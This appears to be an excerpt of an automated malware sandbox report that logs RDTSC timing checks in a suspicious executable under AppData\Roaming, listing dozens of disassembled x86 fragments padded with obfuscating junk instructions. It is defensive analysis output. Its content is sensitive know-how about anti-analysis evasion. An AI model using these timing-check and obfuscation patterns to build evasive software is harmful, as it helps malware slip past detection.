Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5A766D second address: 5A7679 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5A7679 second address: 5A7697 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F95FD7D89A8h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5A7697 second address: 5A76BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 pushad 0x00000007 pushad 0x00000008 jmp 00007F95FD07A05Fh 0x0000000d jns 00007F95FD07A056h 0x00000013 ja 00007F95FD07A056h 0x00000019 popad 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5A63D9 second address: 5A63DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5A63DE second address: 5A6418 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F95FD07A070h 0x00000008 jmp 00007F95FD07A060h 0x0000000d jmp 00007F95FD07A05Ah 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F95FD07A066h 0x00000019 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5A6AF5 second address: 5A6B27 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F95FD7D8996h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F95FD7D899Bh 0x00000011 ja 00007F95FD7D8998h 0x00000017 push edi 0x00000018 pop edi 0x00000019 popad 0x0000001a push edi 0x0000001b push edi 0x0000001c jmp 00007F95FD7D899Eh 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5A6F18 second address: 5A6F2B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F95FD07A05Bh 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5A6F2B second address: 5A6F2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5A6F2F second address: 5A6F33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5A6F33 second address: 5A6F4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F95FD7D89A0h 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5A71C8 second address: 5A71D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5A71D1 second address: 5A71DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F95FD7D8996h 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5A7372 second address: 5A7377 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5A7377 second address: 5A737F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5A737F second address: 5A7385 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5A7385 second address: 5A738E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5A7511 second address: 5A7520 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007F95FD07A056h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5AA22D second address: 5AA233 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5AA233 second address: 5AA240 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jc 00007F95FD07A05Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5AA240 second address: 5AA244 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5AA244 second address: 5AA249 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5AA249 second address: 5AA288 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F95FD7D89A7h 0x00000009 jo 00007F95FD7D8996h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F95FD7D89A4h 0x00000019 pushad 0x0000001a pushad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5AA288 second address: 5AA28E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5AA28E second address: 5AA293 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5AF4F4 second address: 5AF505 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F95FD07A056h 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5AF505 second address: 5AF509 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5AE325 second address: 5AE32A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5AE4A5 second address: 5AE4C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F95FD7D89A8h 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5882F8 second address: 588391 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 jmp 00007F95FD07A068h 0x0000000b nop 0x0000000c mov di, 437Bh 0x00000010 push dword ptr fs:[00000000h] 0x00000017 cmc 0x00000018 mov dword ptr fs:[00000000h], esp 0x0000001f push 00000000h 0x00000021 push ebp 0x00000022 call 00007F95FD07A058h 0x00000027 pop ebp 0x00000028 mov dword ptr [esp+04h], ebp 0x0000002c add dword ptr [esp+04h], 0000001Bh 0x00000034 inc ebp 0x00000035 push ebp 0x00000036 ret 0x00000037 pop ebp 0x00000038 ret 0x00000039 and bx, E8EDh 0x0000003e mov eax, dword ptr [ebp+122D0369h] 0x00000044 mov edi, dword ptr [ebp+1245E2A1h] 0x0000004a push FFFFFFFFh 0x0000004c js 00007F95FD07A05Ch 0x00000052 push ebx 0x00000053 xor ebx, 5ADA31B9h 0x00000059 pop edi 0x0000005a nop 0x0000005b jmp 00007F95FD07A066h 0x00000060 push eax 0x00000061 push eax 0x00000062 push edx 0x00000063 pushad 0x00000064 push eax 0x00000065 push edx 0x00000066 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 588391 second address: 588397 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 588397 second address: 58839C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 58839C second address: 5883A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5883A2 second address: 5883A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 58951C second address: 589524 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 589524 second address: 589528 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 58B62E second address: 58B632 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 58B632 second address: 58B657 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop esi 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d jns 00007F95FD07A060h 0x00000013 push eax 0x00000014 push edx 0x00000015 je 00007F95FD07A056h 0x0000001b rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 58B657 second address: 58B65B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 58EBA3 second address: 58EC02 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F95FD07A060h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push dword ptr fs:[00000000h] 0x00000013 mov bh, E1h 0x00000015 mov dword ptr fs:[00000000h], esp 0x0000001c mov dword ptr [ebp+122D248Fh], eax 0x00000022 mov eax, dword ptr [ebp+122D07F9h] 0x00000028 mov bx, 6EEEh 0x0000002c push FFFFFFFFh 0x0000002e push 00000000h 0x00000030 push ebp 0x00000031 call 00007F95FD07A058h 0x00000036 pop ebp 0x00000037 mov dword ptr [esp+04h], ebp 0x0000003b add dword ptr [esp+04h], 00000014h 0x00000043 inc ebp 0x00000044 push ebp 0x00000045 ret 0x00000046 pop ebp 0x00000047 ret 0x00000048 nop 0x00000049 jp 00007F95FD07A05Eh 0x0000004f push esi 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 58FD41 second address: 58FD46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 590AE3 second address: 590AE8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 590AE8 second address: 590B4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a mov ebx, dword ptr [ebp+12484F62h] 0x00000010 push dword ptr fs:[00000000h] 0x00000017 adc bh, 0000004Fh 0x0000001a mov dword ptr fs:[00000000h], esp 0x00000021 push 00000000h 0x00000023 push ecx 0x00000024 call 00007F95FD7D8998h 0x00000029 pop ecx 0x0000002a mov dword ptr [esp+04h], ecx 0x0000002e add dword ptr [esp+04h], 00000017h 0x00000036 inc ecx 0x00000037 push ecx 0x00000038 ret 0x00000039 pop ecx 0x0000003a ret 0x0000003b mov eax, dword ptr [ebp+122D0795h] 0x00000041 jne 00007F95FD7D8999h 0x00000047 push FFFFFFFFh 0x00000049 nop 0x0000004a jmp 00007F95FD7D899Bh 0x0000004f push eax 0x00000050 pushad 0x00000051 push eax 0x00000052 push edx 0x00000053 push eax 0x00000054 push edx 0x00000055 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 590B4B second address: 590B4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 590B4F second address: 590B5D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F95FD7D899Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5AEFC1 second address: 5AEFCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5AEFCC second address: 5AEFD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 57DC9E second address: 55E2ED instructions: 0x00000000 rdtsc 0x00000002 ja 00007F95FD07A056h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push esi 0x0000000f call 00007F95FD07A058h 0x00000014 pop esi 0x00000015 mov dword ptr [esp+04h], esi 0x00000019 add dword ptr [esp+04h], 00000016h 0x00000021 inc esi 0x00000022 push esi 0x00000023 ret 0x00000024 pop esi 0x00000025 ret 0x00000026 jmp 00007F95FD07A05Bh 0x0000002b push edi 0x0000002c jbe 00007F95FD07A05Bh 0x00000032 mov edi, 1BC9F3D9h 0x00000037 pop edi 0x00000038 call dword ptr [ebp+122D29AFh] 0x0000003e pushad 0x0000003f push ebx 0x00000040 push esi 0x00000041 pop esi 0x00000042 pop ebx 0x00000043 push eax 0x00000044 push edx 0x00000045 pushad 0x00000046 popad 0x00000047 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 57DE37 second address: 57DE3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 57E149 second address: 57E14D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 57E14D second address: 57E153 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 57E36E second address: 57E372 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 57E372 second address: 57E376 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 57E376 second address: 57E39C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F95FD07A05Dh 0x0000000b popad 0x0000000c xchg eax, esi 0x0000000d movzx ecx, bx 0x00000010 nop 0x00000011 pushad 0x00000012 push esi 0x00000013 pushad 0x00000014 popad 0x00000015 pop esi 0x00000016 jc 00007F95FD07A05Ch 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 57E39C second address: 57E3B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F95FD7D89A2h 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 57E479 second address: 57E496 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push esi 0x00000009 pushad 0x0000000a jl 00007F95FD07A056h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 pop esi 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 57E496 second address: 57E49A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 57E49A second address: 57E4CC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jo 00007F95FD07A056h 0x0000000f popad 0x00000010 popad 0x00000011 mov eax, dword ptr [eax] 0x00000013 pushad 0x00000014 push ebx 0x00000015 je 00007F95FD07A056h 0x0000001b pop ebx 0x0000001c push ebx 0x0000001d push edi 0x0000001e pop edi 0x0000001f pop ebx 0x00000020 popad 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 pushad 0x00000026 ja 00007F95FD07A058h 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 57E4CC second address: 57E4D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 57E597 second address: 57E59C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 57EADD second address: 57EAF5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F95FD7D899Fh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 57EAF5 second address: 57EB06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 jnp 00007F95FD07A060h 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 57EB06 second address: 57EB65 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push esi 0x0000000a call 00007F95FD7D8998h 0x0000000f pop esi 0x00000010 mov dword ptr [esp+04h], esi 0x00000014 add dword ptr [esp+04h], 00000018h 0x0000001c inc esi 0x0000001d push esi 0x0000001e ret 0x0000001f pop esi 0x00000020 ret 0x00000021 sub edi, dword ptr [ebp+12470923h] 0x00000027 mov ecx, dword ptr [ebp+122D3715h] 0x0000002d push 0000001Eh 0x0000002f push 00000000h 0x00000031 push eax 0x00000032 call 00007F95FD7D8998h 0x00000037 pop eax 0x00000038 mov dword ptr [esp+04h], eax 0x0000003c add dword ptr [esp+04h], 00000015h 0x00000044 inc eax 0x00000045 push eax 0x00000046 ret 0x00000047 pop eax 0x00000048 ret 0x00000049 nop 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d push eax 0x0000004e pop eax 0x0000004f jo 00007F95FD7D8996h 0x00000055 popad 0x00000056 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 57EB65 second address: 57EB6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 57EB6B second address: 57EB6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 57EC7D second address: 57EC83 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5B37ED second address: 5B37F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5B3B17 second address: 5B3B1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5B3C6D second address: 5B3C73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5B3C73 second address: 5B3C8B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F95FD07A063h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5B3C8B second address: 5B3CD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F95FD7D8996h 0x0000000a jmp 00007F95FD7D89A3h 0x0000000f popad 0x00000010 jmp 00007F95FD7D89A0h 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F95FD7D89A0h 0x0000001e jmp 00007F95FD7D899Bh 0x00000023 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5B3CD8 second address: 5B3CE2 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F95FD07A05Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5B3FB1 second address: 5B3FB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5B3FB7 second address: 5B3FBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5B3FBB second address: 5B3FC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5B4265 second address: 5B427F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F95FD07A061h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5BC551 second address: 5BC557 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5BC557 second address: 5BC55B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5BC55B second address: 5BC55F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5BCB36 second address: 5BCB3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5C090A second address: 5C0941 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95FD7D899Dh 0x00000007 jmp 00007F95FD7D899Fh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jmp 00007F95FD7D89A7h 0x00000013 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5C0367 second address: 5C036B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5C0604 second address: 5C0613 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F95FD7D8996h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
